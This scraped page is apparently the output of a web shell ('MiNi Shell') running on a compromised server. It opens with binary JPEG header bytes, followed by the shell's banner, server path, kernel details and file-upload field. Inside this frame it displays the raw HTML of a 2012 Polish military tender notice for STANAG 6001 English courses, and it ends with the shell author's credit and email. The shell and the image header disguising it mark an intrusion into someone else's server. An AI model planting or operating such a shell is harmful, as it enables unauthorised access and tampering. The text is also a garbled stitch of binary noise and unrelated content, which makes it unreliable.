JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120201/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120201/26689-N-2012.html

<p class="kh_header"><b>Wędrzyn: WYKONANIE USŁUGI PRZEPROWADZENIA DWÓCH SEMESTRÓW KURSU JĘZYKA ANGIELSKIEGO WEDŁUG WYMOGÓW STANAG 6001</b><br>
<b>Numer ogłoszenia: 26689 - 2012; data zamieszczenia: 01.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 5701 Wędrzyn , 69-211 Wędrzyn, woj. lubuskie, tel. 95 7556236, faks 95 7556222.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Skarbu Państwa podległa MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE USŁUGI PRZEPROWADZENIA DWÓCH SEMESTRÓW KURSU JĘZYKA ANGIELSKIEGO WEDŁUG WYMOGÓW STANAG 6001.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie dwóch semestrów kursu języka angielskiego stacjonarnego , uzupełniającego oraz doskonalącego na poziomie I i II, dla JW. 5700 w MIĘDZYRZECZU oraz w JW. 3949 SKWIERZYNIE zgodnie z wymogami STANAG 6001 w następujących grupach szkoleniowych:

SEMESTR I ( w terminie 20.02.2012-30.06.2012r)
A. 2 grupy szkoleniowe kursu stacjonarnego poziomu I ( podstawowego) 
dla JW. 5700 MIĘDZYRZECZ, z podziałem na miejsce szkolenia ( jedna grupa w Międzyrzeczu druga grupa w Wędrzynie)
B. 1 grupa szkoleniowa kursu uzupełniającego poziomu I ( podstawowego),  miejsce szkolenia JW. 3949 SKWIERZYNA.
C. 1 grupa szkoleniowa kursu doskonalącego  poziomu II (średniozaawansowanego), miejsce szkolenia JW. 3949 SKWIERZYNA.

SEMESTR II ( w terminie 03.09.2012- 25.01.2013r.)
A) 2 grupy szkoleniowe kursu stacjonarnego poziomu I ( podstawowego) 
dla JW. 5700 MIĘDZYRZECZ,  z podziałem na miejsce szkolenia ( jedna grupa w Międzyrzeczu druga grupa w Wędrzynie)
B) 1 grupa szkoleniowa kursu uzupełniającego poziomu I (podstawowego)
dla JW. 5700 MIĘDZYRZECZ, miejsce realizacji garnizon Wędrzyn lub Międzyrzecz .
C) 1 grupa szkoleniowa kursu uzupełniającego poziomu II (średniozaawansowanego) dla JW. 5700 MIĘDZYRZECZ, miejsce realizacji zadania garnizon Wędrzyn lub Międzyrzecz.

Uwarunkowania:
1. Wykonawca opracuje i przeprowadzi kurs zgodnie z programem nauczania  według STANAG 6001  na podstawie:
-dla JW. 5700 MIĘDZYRZECZ   CAMPAINGN- English for the military cz. I i II , Wytycznych Szefa Szkolenia 11 DKPanc, 
- dla JW. 3949 SKWIERZYNA   CAMPAINGN- English for the military cz. I i II, Wytycznych Szefa Szkolenia Sił Powietrznych oraz Wytycznych Szefa Szkolenia 3 BROP Warszawa na 2012 r.
2. Ilość godzin lekcyjnych w jednej grupie:
- na poziomie pierwszym - podstawowym w wymiarze 590 godzin lekcyjnych;
- na poziomie pierwszym -uzupełniającym w wymiarze 240 godzin;
- na poziomie drugim - doskonalący w wymiarze 120 godzin;
- na poziomie drugim - uzupełniającym w wymiarze 240 godzin.
Łączna ilość godzin lekcyjnych w dwóch semestrach- 3200
3. Każda godzina lekcyjna trwa 45 minut.
4. Kurs podstawowy będzie prowadzony w dni robocze od poniedziałku do czwartku w godzinach 8:15-14:15, w piątek od 8:15 do 13:25.
5. Kursy uzupełniające prowadzone będą w dni robocze: 
- dla JW. 5700 MIĘDZYRZECZ w systemie 2 dni szkoleniowe w tygodniu po 6 godzin lekcyjnych od 8:15 do 14:15.
- dla JW. 3949 w systemie 3 dni szkoleniowe w tygodniu tj. w poniedziałki 7 godzin ( 8:30 15:00), wtorek 2 godziny ( 13:00-15:00) i piątek 5 godzin (10:30 -15:00)
6. Kurs doskonalący  prowadzony będzie w dni robocze poniedziałek 3 godziny ( 13:20-15:00) i piątek 4 godziny (11:30-15:00).
7. Wykonawca zabezpiecza wszystkie materiały szkoleniowe.
8. Wykonawca do przeprowadzenia kursu na poszczególnych poziomach do każdej grupy szkoleniowej wyznaczy po dwóch lektorów wykładowców o odpowiednim wykształceniu: magister filologii angielskiej lub licencjat na kierunku filologia angielska.
9. Wykładowcy muszą posiadać co najmniej dwuletnie doświadczenie w prowadzeniu kursów na poziomie 1 i 2 w jednostkach wojskowych (znajomość terminologii wojskowej) oraz kurs metodyczno - specjalistyczny przeprowadzony w instytucji wojskowej dla lektorów.
10.	Planowany termin kursu:
- Semestr I : 20.02.2012 r.- 30.06.2012 r. 
- Semestr II : 03.09.2012 r.- 25.01.2013 r.
Uczestnicy kursów uzupełniających będą obligatoryjnie kierowani przez Dowódcę Jednostki na egzaminy eksternistyczne.

 Dodatkowe wymagania Zamawiającego związane z przedmiotem zamówienia:
1) Wykonawca musi posiadać doświadczenie w prowadzeniu kursów języka angielskiego w wojsku przygotowujących do egzaminów resortowych wg STANAG 6001.
2) Wykonawca musi posiadać niezbędny potencjał umożliwiający nauczanie języka angielskiego z zakresu frazeologii związanej z wojskowością i lotnictwem (frazeologii technicznej języka angielskiego).
3) Lektorzy winni posiadać odpowiednie wykształcenie kierunkowe dające kwalifikacje do nauczania języka angielskiego jako języka obcego na wszystkich poziomach zaawansowania (adekwatnym do poziomu prowadzonego kursu), z przygotowaniem metodycznym oraz minimum dwuletnim doświadczeniem zawodowym. Ponadto lektorzy muszą legitymować się tytułem magistra filologii angielskiej lub licencjata.
4) Do każdej grupy musi być przypisanych po dwóch lektorów do nauczania języka angielskiego, gdzie jeden z nich ma być wyznaczony na lektora prowadzącego, który będzie odpowiedzialny za prowadzenie dokumentacji wykonywania comiesięcznych raportów z nauczania grup szkoleniowych oraz słuchaczy zgodnie ze wzorem, patrz załącznik nr 9.
5) W skład dokumentacji szkoleniowej mają wchodzić następujące dokumenty:
- Plan konspekt do zajęć (przykład patrz załącznik nr 10) - na  każde zajęcia;
- Tygodniowy Rozkład Zajęć (przykład patrz załącznik nr 11);
- Dziennik Lekcyjny na bieżąco;
które będą zatwierdzane przed rozpoczęciem zajęć przez koordynatorów kursów 17 BZ, JW. 3949.
6) Przelewy finansowe za zrealizowane zajęcia będą dokonywane w trybie miesięcznym po rozliczeniu się z dokumentacji szkoleniowej u koordynatorów kursów JW. 5700 i JW. 3949.
7) W ramach prowadzonych kursów prowadzić weryfikację uczestników kursu w celu wykluczenia osób, które nie uzyskały minimum programowego w poszczególnych etapach kształcenia określonych w programie wg następujących zasad:
- po pierwszym etapie nauki (5-7 tygodni);
- po połowie przeprowadzonych tematów ;
8) Przed rozpoczęciem kursu odbędzie się szkolenie dla lektorów prowadzących zajęcia prowadzone przez koordynatorów kursów ( JW. 5700 i JW. 3949) w celu uszczegółowienia wymagań w zakresie prowadzenia wyżej wymienionej dokumentacji szkolenia ( termin przeprowadzenia szkolenia oraz godzina zostaną zostaną uzgodnione pomiędzy stronami po rozstrzygnięciu postępowania.
9) W koszt szkolenia (każdej godziny lekcyjnej) powinno być wliczone:
- szkolenie w grupie do 10 - 15 osób;
- opracowanie i przedstawienie do zatwierdzenia Dowódcy jednostki wojskowej (za pośrednictwem koordynatorów kursów) Szczegółowych programów szkolenia stosownie do poziomu prowadzonego kursu;
- zabezpieczenie w podręczniki dla wszystkich uczestników kursu;
- dydaktyczne pomoce audiowizualne: kasety audio do ćwiczeń; kasety video i płyty cd/dvd do ćwiczeń; podręczniki wraz z ćwiczeniami.
- wstępna ocena poziomu słuchaczy - testy kwalifikacyjne;
- miesięczna ocena postępów nauczania - raporty z obecności oraz osiągniętych wyników (patrz załącznik nr 9);
- przedstawianie do 10 dnia każdego miesiąca raportu z osiągniętych  postępów słuchaczy kursu lub zapewnienie elektronicznego systemu dostępu do postępów słuchaczy (dziennik elektroniczny);
- nadzory metodyczne nad pracą lektorów - hospitacja zajęć co najmniej jeden raz w miesiącu przeprowadzana przez osobę posiadająca odpowiednie uprawnienia wyznaczoną przez koordynatora placówki;
- skierowanie innego lektora, o kwalifikacjach wymaganych w umowie oraz Specyfikacji Istotnych Warunków Zamówienia, w przypadku absencji lektorów prowadzących grupy;
- prowadzenie dokumentacji szkoleniowej zgodnie z pkt nr  6.
10) W przypadku stwierdzonych przez koordynatorów kursów lub osób kontrolujących niedbałości w prowadzeniu zajęć pod względem organizacyjnym, merytorycznym lub metodycznym , a także niskiej efektywności szkolenia umowa może zostać zerwana..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga sie wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust.1 (załącznik nr 2)
b)	Oświadczenie o braku podstaw do wykluczenia (załącznik nr 3)
c)	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru wystawiony (lub uaktualniony) przez odpowiedni,  uprawniony do ich wystawienia organ, nie więcej niż 6 miesięcy przed upływem terminu składania ofert.
d)	Oświadczenie, że Wykonawca nie zalega z opłacaniem podatków lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (załącznik nr 4); 
e)	Oświadczenie, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (załącznik nr 5);
f)	Zamawiajacy żąda, aby Wykonawca do oferty dołączył dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty np.: aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy (Wymagane dokumenty można złożyć w formie kopii poświadczonej z oryginałem przez Wykonawcę).

Opis  sposobu dokonywania oceny tych warunków:
Ocena wyżej wymienionych warunków zostanie dokonana na podstawie załączonych przez Wykonawcę oświadczeń i dokumentów. Zamawiający uzna warunki za spełnione w przypadku gdy Wykonawca dostarczy komplet żądanych oświadczeń wypełnionych zgodnie z przedstawionymi w SIWZ załącznikami oraz załączy dokument, z którego wynikać będzie uprawnienie do podpisania oferty.
Zamawiający dokona oceny spełnienia powyższych warunków zgodnie z formułą spełnia-nie spełnia .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy przedstawią  wykaz wykonanych w okresie ostatnich 3 lat  usług przeprowadzania kursów języka angielskiego wg wymogów STANAG 6001 w jednostkach wojskowych lub innych instytucjach MON, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie -  zawierającymi jasno określoną liczbę przeprowadzonych kursów ich wymiar godzinowy i poziom nauczania języka. Zamawiający będzie brał pod uwagę kursy języka angielskiego poziom I lub poziom II przeprowadzone zgodnie z wymogami STANAG 6001, których minimalna zdawalność wynosiła 60% i została potwierdzona referencjami  z jednostek wojskowych lub innych instytucji MON, w których odbywały się kursy  (wg wzoru zawartego w załączniku nr  6).
Pod pojęciem kursu Zamawiający rozumie zajęcia przeprowadzone w grupie na poziomie pierwszym lub drugim w określonym terminie oraz w pełnym wymiarze godzin zgodnie z wymogami STANAG 6001.

Opis  sposobu dokonywania oceny tego warunku:
Ocena wyżej wymienionego warunku zostanie dokonana na podstawie załączonego przez Wykonawcę wypełnionego wykazu usług zgodnie z przedstawionym w SIWZ załącznikiem numer 6. Zamawiający dokona oceny spełnienia powyższych warunków zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy  zapewnią prowadzenie zajęć przez kadrę dydaktyczną posiadającą następujące wykształcenie i doświadczenie zawodowe:
absolwenci anglistyki lub kolegiów nauczycielskich posiadający tytuł  magistra filologii angielskiej lub tytuł licencjata, z udokumentowanym minimum dwuletnim doświadczeniem pedagogicznym w prowadzeniu kursów na poziomie pierwszym lub drugim w jednostkach wojskowych (niezbędna jest znajomość terminologii wojskowej)  od chwili uzyskania dyplomu - minimum 2 lektorów dla każdej grupy (załącznik nr 7) oraz posiadać kurs metodyczno specjalistyczny przeprowadzony w instytucji wojskowej dla lektorów.

Opis  sposobu dokonywania oceny tego warunku:
Ocena wyżej wymienionego warunku zostanie dokonana na podstawie załączonego przez Wykonawcę załącznika numer 7 do SIWZ stanowiącego wykaz osób, które będą wykonywać zamówienie wraz z dokumentami potwierdzającymi wykształcenie i doświadczenie zawodowe. Zamawiający dokona oceny spełnienia powyższych warunków zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Oświadczenie, że Wykonawca nie zalega z opłacaniem podatków lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (załącznik nr 4); 
b)	Oświadczenie, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (załącznik nr 5);
c)	Zamawiajacy żąda, aby Wykonawca do oferty dołączył dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty np.: aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy (Wymagane dokumenty można złożyć w formie kopii poświadczonej z oryginałem przez Wykonawcę).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - doświadczenie w prowadzeniu kursów w jednostkach wojskowych lub innych instytucjach MON - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 5701 Wędrzyn
69-211 Wędrzyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2012 godzina 08:45, miejsce: Jednostka Wojskowa 5701 Wędrzyn
69-211 Wędrzyn
 Kancelaria Jawna bud. nr 33, II piętro, pok. 211 (kancelaria czynna jest od poniedziałku do piątku w godz. 7.00- 15.00)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com